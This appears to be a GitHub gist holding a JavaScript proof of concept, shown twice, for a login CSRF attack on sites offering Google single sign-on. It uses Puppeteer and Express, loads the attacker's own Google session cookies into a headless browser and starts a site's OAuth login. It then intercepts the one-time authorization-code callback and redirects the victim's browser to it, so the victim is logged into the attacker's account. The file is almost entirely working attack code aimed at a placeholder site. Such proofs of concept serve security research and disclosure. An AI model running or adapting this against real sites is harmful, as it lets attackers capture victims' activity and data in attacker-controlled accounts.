lauritzh/poc.js

## poc.js
//
// Headless SSO Login CSRF PoC
// (c) Lauritz Holtmann, 2023
//

const pt = require('puppeteer')
const express = require('express')
const app = express()
const port = 3000

app.get('/', (req, res) => {
  res.send('Lauritz')
})

app.get('/poc', async (req, res) => {
  console.log("Starting PoC");
  // TODO: Replace with your own cookies (browse accounts.google.com and copy cookies from developer console)
  const cookies = [
    {name: 'SID', value: 'Uw[...]', domain: 'accounts.google.com'},
    {name: '__Secure-3PSID', value: 'Uw[...]', domain: 'accounts.google.com', secure: true},
    {name: 'LSID', value: 'o.mail.google.com|o.myaccount.google.com|o.play.google.com|s.DE:[...]', domain: 'accounts.google.com'},
  ];

  // Init: Start the browser
  const browser = await pt.launch({headless: true});
  const page = await browser.newPage();
  await page.setCookie(...cookies);
  await page.setRequestInterception(true);

  // Intercept the redirect to the callback URL -> The "code" parameter can only be used once
  //   Therefore, we need to intercept the redirect and return it to the client (i.e. the victim browser)
  page.on("request", async request => {
    if(request.url().startsWith("https://example.com/callback"))  {
      console.log("Redirected to: " + request.url());
      request.abort();
      // CSRF: Respond with a redirect to the callback URL => Victim user is authenticated using the attacker account
      res.redirect(request.url());
      return;
    }
    request.continue();
  });

  // Start the SSO Login Flow: The following URL results in a SSO flow being initiated
  console.log("Navigate to URL");
  await page.goto('https://example.com/login/google');
  await page.waitForNavigation({waitUntil: 'networkidle0'});
  await browser.close();
  console.log("Done");
});

app.listen(port, () => {
  console.log(`Example app listening on port ${port}`);
})
	//
	// Headless SSO Login CSRF PoC
	// (c) Lauritz Holtmann, 2023
	//

	const pt = require('puppeteer')
	const express = require('express')
	const app = express()
	const port = 3000

	app.get('/', (req, res) => {
	res.send('Lauritz')
	})

	app.get('/poc', async (req, res) => {
	console.log("Starting PoC");
	// TODO: Replace with your own cookies (browse accounts.google.com and copy cookies from developer console)
	const cookies = [
	{name: 'SID', value: 'Uw[...]', domain: 'accounts.google.com'},
	{name: '__Secure-3PSID', value: 'Uw[...]', domain: 'accounts.google.com', secure: true},
	{name: 'LSID', value: 'o.mail.google.com\|o.myaccount.google.com\|o.play.google.com\|s.DE:[...]', domain: 'accounts.google.com'},
	];

	// Init: Start the browser
	const browser = await pt.launch({headless: true});
	const page = await browser.newPage();
	await page.setCookie(...cookies);
	await page.setRequestInterception(true);

	// Intercept the redirect to the callback URL -> The "code" parameter can only be used once
	// Therefore, we need to intercept the redirect and return it to the client (i.e. the victim browser)
	page.on("request", async request => {
	if(request.url().startsWith("https://example.com/callback")) {
	console.log("Redirected to: " + request.url());
	request.abort();
	// CSRF: Respond with a redirect to the callback URL => Victim user is authenticated using the attacker account
	res.redirect(request.url());
	return;
	}
	request.continue();
	});

	// Start the SSO Login Flow: The following URL results in a SSO flow being initiated
	console.log("Navigate to URL");
	await page.goto('https://example.com/login/google');
	await page.waitForNavigation({waitUntil: 'networkidle0'});
	await browser.close();
	console.log("Done");
	});

	app.listen(port, () => {
	console.log(`Example app listening on port ${port}`);
	})